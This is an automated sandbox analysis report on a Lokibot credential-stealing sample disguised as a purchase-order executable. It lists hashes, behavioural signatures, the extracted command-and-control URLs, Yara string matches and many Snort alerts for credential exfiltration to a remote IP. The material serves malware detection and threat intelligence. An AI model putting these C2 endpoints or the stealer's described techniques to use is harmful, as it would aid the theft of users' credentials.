Windows Analysis Report Purchase Order #5000012803.exe

Overview

General Information

Sample Name: Purchase Order #5000012803.exe
Analysis ID: 553040
MD5: d62b8a5fdb90e9241ff0eef6ea035e32
SHA1: 4e9e38dc4d01a649d927a933488477c5980fcb18
SHA256: 95f5680fe4d7830a393aa84b2278051638f3c8105766c47a68c1f8981f38932b
Tags: exe, Loki

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security |
00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp | Loki_1 | Loki Payload | kevoreilly |
  • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x153fc:$a2: last_compatible_version
00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group |
  • 0x13bff:$des3: 68 03 66 00 00
  • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

Unpacked PEs

Source | Rule | Description | Author | Strings
1.0.Purchase Order #5000012803.exe.400000.3.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth |
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13e80:$s2: https://
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://
1.0.Purchase Order #5000012803.exe.400000.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
1.0.Purchase Order #5000012803.exe.400000.3.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
1.0.Purchase Order #5000012803.exe.400000.3.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security |
1.0.Purchase Order #5000012803.exe.400000.3.unpack | Loki_1 | Loki Payload | kevoreilly |
  • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x13ffc:$a2: last_compatible_version

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
Multi AV Scanner detection for submitted file
Source: Purchase Order #5000012803.exe, ReversingLabs: Detection: 25%
Antivirus detection for URL or domain
Source: http://slimpackage.com/slimfit/five/fre.php, Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: Purchase Order #5000012803.exe, Joe Sandbox ML: detected
Source: 1.0.Purchase Order #5000012803.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen2
Source: Purchase Order #5000012803.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP source: Purchase Order #5000012803.exe, 00000000.00000003.663596195.00000000032C0000.00000004.00000001.sdmp, Purchase Order #5000012803.exe, 00000000.00000003.663359246.0000000003130000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: Purchase Order #5000012803.exe, 00000000.00000003.663596195.00000000032C0000.00000004.00000001.sdmp, Purchase Order #5000012803.exe, 00000000.00000003.663359246.0000000003130000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe, Code function: 0_2_00405D7C FindFirstFileA,FindClose,0_2_00405D7C
Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe, Code function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004053AA
Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe, Code function: 0_2_00402630 FindFirstFileA,0_2_00402630
Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe, Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49765 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49765 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49765 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49765 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49766 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49766 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49766 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49766 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49767 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49767 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49767 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49767 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49768 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49768 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49768 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49768 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49769 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49769 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49769 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49769 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49770 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49770 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49770 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49770 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49771 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49771 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49771 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49771 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49772 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49772 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49772 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49772 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49773 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49773 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49773 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49773 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49774 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49774 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49774 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49774 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49775 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49775 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49775 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49775 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49776 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49776 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49776 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49776 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49777 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49777 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49777 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49777 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49778 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49778 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49778 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49778 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49781 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49781 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49781 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49781 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49782 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49782 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49782 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49782 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49783 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49783 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49783 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49783 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49784 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49784 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49784 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49784 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49785 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49785 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49785 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49785 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49786 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49786 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49786 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49786 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49787 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49787 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49787 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49787 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49788 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49788 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49788 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49788 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49789 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49789 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49789 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49789 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49790 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49790 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49790 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49790 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49791 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49791 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49791 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49791 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49792 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49792 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49792 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49792 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49793 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49793 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49793 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49793 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49794 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49794 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49794 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49794 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49795 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49795 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49795 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49795 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49797 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49797 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49797 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49797 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49804 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49804 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49804 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49804 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49823 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49823 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49823 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49823 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49833 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49833 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49833 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49833 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49834 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49834 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49834 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49834 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49835 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49835 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49835 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49835 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49841 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49841 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49841 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49841 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49842 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49842 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49842 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49842 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49843 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49843 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49843 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49843 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49845 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49845 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49845 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49845 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49846 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49846 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49846 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49846 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49852 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49852 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49852 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49852 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49857 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49857 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49857 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49857 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49864 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49864 -> 104.223.93.105:80
